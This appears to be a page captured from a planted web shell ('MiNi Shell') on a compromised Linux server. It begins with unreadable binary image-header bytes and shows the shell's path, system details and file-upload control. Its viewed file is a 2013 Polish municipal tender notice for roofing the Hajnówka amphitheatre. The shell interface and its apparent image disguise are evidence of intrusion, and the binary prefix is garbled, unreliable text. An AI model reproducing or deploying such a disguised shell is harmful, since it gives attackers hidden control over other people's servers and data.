JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130724/292054-N-2013.html

<p class="kh_header"><b>Hajnówka: Zadaszenie amfiteatru miejskiego w Hajnówce</b><br>
<b>Numer ogłoszenia: 292054 - 2013; data zamieszczenia: 24.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Hajnówka , ul. Aleksego Zina 1, 17-200 Hajnówka, woj. podlaskie, tel. 085 6822180, 6822875, faks 085 6822994.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.hajnowka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadaszenie amfiteatru miejskiego w Hajnówce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest realizacja zadania  pn: Zadaszenie  widowni  amfiteatru  miejskiego  w  Hajnówce. Zakres  przedmiotowy  obejmuje:

1. Roboty  ziemne  związane  z  wykonaniem  wykopów  i  nasypów.  
2. Wykonanie  ław  i  stóp  fundamentowych  oraz  pylonów  żelbetowych.
3. Wykonanie  i  montaż  dźwigarów  wspornikowych  z  drewna  iglastego, klejonego.
4. Wykonanie  pokrycia  dachowego  z  płyt  poliwęglanowych, 4-komorowych - 1 071,8 m2.
5. Wykonanie  obróbek  blacharskich  i  orynnowania  z  blachy  stalowej  ocynkowanej.
6. Wykonanie  kanalizacji  deszczowej  z  rur  PCV  do  odprowadzenia  wód  opadowych  z  dachu  
     amfiteatru.
7. Wykonanie  instalacji  oświetlenia  ogólnego  widowni  amfiteatru  i  instalacji  odgromowej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferent  przystępujący  do  przetargu  zobowiązany  jest  wnieść  wadium  w  wysokości 50 000,00 PLN
2. Wadium  może  być  wnoszone  w  jednej  lub  kilku  następujących  formach: 
    a. pieniądzu,
    b. poręczeniach  bankowych,
    c. poręczeniach  spółdzielczej  kasy  oszczędnościowo - kredytowej, z  tym  że  poręczenie  kasy jest  zawsze  poręczeniem  pieniężnym,
    d. gwarancjach  bankowych,  
    e. gwarancjach  ubezpieczeniowych,  
    f. poręczeniach  udzielanych  przez  podmioty, o  których  mowa  w  art. 6b  ust. 5 pkt 2  ustawy z  dnia  9 listopada  2000 roku  o  utworzeniu  Polskiej  Agencji  Rozwoju  Przedsiębiorczości (Dz. U.  z  2007 r. Nr  42, poz. 275  wraz  z  późniejszymi  zmianami).
3. Wadium  wnoszone  w  formie  pieniężnej  należy  wpłacić  przelewem  na  rachunek  bankowy  Nr  52 1020 1332 0000 1302 0037 7218  w  PKO  BP  S.A.  Oddział  w  Hajnówce  z  dopiskiem  na  blankiecie  przelewu  Wadium - Zadaszenie  widowni  amfiteatru miejskiego w  Hajnówce. Dowód  wpłaty  lub  jego  kserokopię  poświadczoną  za  zgodność  z  orginałem  należy  dołączyć  do  oferty. Nie  dopuszcza  się  wnoszenia  wadium  w  formie  pieniężnej w  kasie  Zamawiającego.
4. Wadium  wnoszone w pozostałych  formach  należy  załączyć  do  oferty  w  oryginale.
5. Wadium  musi  być  wniesione  najpóźniej  do  wyznaczonego  terminu  składania  ofert, tj.  do  dnia  08 sierpnia  2013 roku, godz. 1000.
7. W  przypadku  wadium  wnoszonego  w  pieniądzu  za  pomocą  przelewu  bankowego  decyduje data  i  godzina  księgowania  na  rachunku  bankowym  Zamawiającego.
8. Wykonawca, który  nie  wniesie  wadium  lub  nie  zabezpieczy  oferty  akceptowalną  formą wadium  zostanie  wykluczony  z  postępowania, a  jego  oferta  zostanie  odrzucona.
9. Zwrot  lub  zatrzymanie  wniesionego  wadium  nastąpi  w  oparciu  o  postanowienia  art. 46  ustawy  z  dnia  29 stycznia  2004 roku  prawo  zamówień  publicznych  (Dz. U. z  2010 roku Nr 113, poz. 759 j.t.  wraz  z  późniejszymi  zmianami).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  warunek  za  spełniony, gdy  Wykonawca  wykaże, że  spełnia  warunek  ubiegania  się  o  udzielenie  zamówienia. Ocena   spełniania  warunku  udziału  w  postępowaniu  dokonywana  będzie  według  formuły  spełnia/nie spełnia  na  podstawie  wyniku  badania  treści  żądanego oświadczenia o spełnieniu warunków ubiegania się o udzielenie  zamówienia (załącznik  nr 2  do  SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  zostanie  spełniony, jeżeli  Wykonawca  wykaże, że  w  okresie  ostatnich  pięciu  lat  przed  upływem  terminu  składania  ofert, a  jeżeli  okres  prowadzenia  działalności  jest krótszy - w tym  okresie, wykonał  co  najmniej  jedną  robotę  budowlaną  odpowiadającą  swoim  rodzajem  i  wartością  robotom  budowlanym stanowiącym przedmiot zamówienia          
z  podaniem  ich  rodzaju, wartości, daty  i  miejsca  wykonania  oraz  załączeniem dokumentów  potwierdzających, że  roboty  te  zostały  wykonane  zgodnie  z  zasadami sztuki  budowlanej  i  prawidłowo  ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  warunek  za  spełniony, gdy  Wykonawca  wykaże, że  spełnia  warunek  ubiegania  się  o  udzielenie  zamówienia. Ocena  spełniania  warunku  udziału  w  postępowaniu  dokonywana  będzie  według  formuły  spełnia/nie spełnia  na  podstawie  wyniku  badania  treści  żądanego  oświadczenia  o  spełnieniu  warunków  ubiegania  się  o  udzielenie  zamówienia (załącznik  nr 2  do  SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  celu  potwierdzenia  spełnienia  warunku  Wykonawca  winien  przedłożyć  wykaz  osób, które  będą  uczestniczyć  w  wykonywaniu  zamówienia, posiadających  uprawnienia  niezbędne  do  wykonania  przedmiotu  zamówienia, wymagane  przepisami  ustawy  z  dnia  7 lipca  1994 roku  Prawo  budowlane  -  tj. uprawnienia  budowlane  wg Rozporządzenia  Ministra  Transportu  i  Budownictwa  z  dnia  28 kwietnia 2006 roku  w  sprawie  samodzielnych  funkcji  technicznych  w  budownictwie  (Dz. U. Nr 83, poz. 578  wraz  z  późniejszymi  zmianami)  do  kierowania  robotami  budowlanymi:                                                  
-  Kierownik  Budowy   -  1 osoba: 
    -  uprawnienia budowlane do  kierowania  robotami w  specjalności  konstrukcyjno-budowlanej  lub  odpowiadające  im  uprawnienia  wydane  na  podstawie  wcześniej  obowiązujących  przepisów,
    -  doświadczenie  zawodowe - co  najmniej  3 lata   
                                              od zyskania  uprawnień,      
-  Kierownik  Robót  w  branży  elektrycznej   -  1 osoba : 
    -  uprawnienia  budowlane  do  kierowania  robotami  specjalności  
       elektrycznej  lub  odpowiadające  im  uprawnienia  wydane  na  
       podstawie  wcześniej  obowiązujących  przepisów,
    -  doświadczenie  zawodowe - co  najmniej  3 lata  od 
                                  uzyskania  prawnień,                                           Kierownik  Robót  w  branży  sanitarnej   -  1 osoba : 
    -  uprawnienia  budowlane  do  kierowania  robotami  w  specjalności  
       sanitarnej  lub  odpowiadające  im  uprawnienia  wydane  na  
       podstawie  wcześniej  obowiązujących  przepisów,
    -  doświadczenie  zawodowe - co  najmniej  3 lata  od 
                                                  uzyskania  uprawnień,


Zamawiający, określając  wymogi  w  zakresie  posiadanych  uprawnień  budowlanych, dopuszcza  odpowiadające  im  uprawnienia  wydane  obywatelom  innych  państw, z  zastrzeżeniem  art. 12a  oraz  innych  przepisów  ustawy  Prawo  budowlane  (Dz. U. z  2010 r.  Nr 243, poz. 1623  j.t.  wraz  z  późniejszymi  zmianami)  oraz  ustawy  o  zasadach  uznawania  kwalifikacji  zawodowych  nabytych  w  państwach  
członkowskich  Unii  Europejskiej  (Dz. U. z  2008 r.  Nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca  musi  wykazać  posiadanie  środków  finansowych  lub  zdolności  kredytowej  w  wysokości  nie  mniejszej  niż  wartość  oferty  (wg. kosztorysu  ofertowego  Wykonawcy).
2. Wykonawca  musi  być  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  związanej  z  przedmiotem  zamówienia  na  wartość  nie  mniejszą  niż  wartość  oferty  (wg. kosztorysu  ofertowego  Wykonawcy).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W  trakcie  realizacji  umowy  postanowienia  umowy  mogą  ulec  zmianom, jeżeli  zmiany będą  korzystne  dla  Zamawiającego  lub  konieczność  wprowadzenia  zmian  wynikać  będzie z  okoliczności, których  nie  można  było  przewidzieć  w  chwili  zawarcia  umowy  i  będą 
dopuszczalne  w  granicach  unormowania  art. 144 ustawy  Prawo  zamówień  publicznych1.
2. Zamawiający  przewiduje  możliwość  zmiany  postanowień  zawartej  umowy  w  przypadku:
a. zmiany  regulacji  prawnych  obowiązujących  w  chwili  zawarcia  umowy,
b. zmiany  danych  dotyczących  Zamawiającego  lub  Wykonawcy,
c. zmiany  Podwykonawcy  robót,
d. zmiany przez Wykonawcę formy wniesienia  zabezpieczenia  należytego  wykonania  umowy.
e. zmiany  osób  kierujących  robotami  budowlanymi,
f. konieczności  wprowadzenia  zmian  w  dokumentacji  projektowej, sposobie  lub  technologii wykonania  przedmiotu  umowy,
g. zmiany  terminu  i  zakresu  wykonania  zamówienia, które  zaistniały  w  trakcie  realizacji przedmiotu  umowy  z  przyczyn  niezależnych  od  Zamawiającego  i  od  Wykonawcy  tj.:  
-  wystąpienia  niekorzystnych  warunków  atmosferycznych, geologicznych  lub  hydrologicznych  uniemożliwiających  ze  względów  technologicznych  wykonanie  przedmiotu  umowy  w  ustalonym  terminie  lub  negatywnie  wpływających  na  jakość  wykonania  lub  trwałość  przedmiotu  umowy,
-  wystąpienia  odkryć  archeologicznych, 
-  natrafienia  na  niewybuchy  i  niewypały, 
-  wystąpienia  klęsk  żywiołowych (powódź, pożar itp.),  
h. zmiana  zasad  finansowania  zamówienia,
i. konieczności  dostosowania  treści  umowy  do  postanowień  umowy  zawartej  przez  Zamawiającego  z  instytucją  współfinansującą  realizację  zamówienia.
3. Warunki  ewentualnych  zmian  -  stosownie  do  czasu  trwania  okoliczności  będących  podstawą zmiany.
4. Zmiana  postanowień  zawartej  umowy  w  przypadkach  określonych  w  pkt. 2  nie  może  prowadzić  do  zwiększenia  wynagrodzenia  Wykonawcy.  
5. Wszystkie  powyższe  zapisy  stanowią  katalog  zmian, na  które  Zamawiający  może  wyrazić  zgodę. Nie  stanowią  jednocześnie  zobowiązania  do  wyrażenia  takiej  zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.hajnowka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Miasta  Hajnówka, 17-200 Hajnówka, ul. Aleksego  Zina 1  pok. 209 lub  pocztą.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2013 godzina 10:00, miejsce: Urząd  Miasta  Hajnówka, 17 - 200 Hajnówka, ul. Aleksego  Zina  1,
                                                 pok. Nr  219  -  sekretariat  Urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program  Współpracy  Transgranicznej  Polska - Białoruś - Ukraina  na  lata  2007 - 2013  finansowany  z  Europejskiego  Instrumentu  Sąsiedztwa  i  Partnerstwa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com